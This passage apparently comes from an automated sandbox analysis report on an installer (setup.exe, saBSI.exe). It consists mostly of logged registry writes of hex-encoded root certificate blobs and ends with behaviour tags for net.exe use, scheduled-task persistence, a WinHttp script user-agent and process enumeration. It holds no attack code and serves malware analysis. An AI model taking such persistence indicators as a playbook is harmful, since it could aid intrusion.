0b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 saBSI.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 saBSI.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 040000000100000010000000e94fb54871208c00df70f708ac47085b0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b81900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b4200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 saBSI.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3932 SchTasks.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 27 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
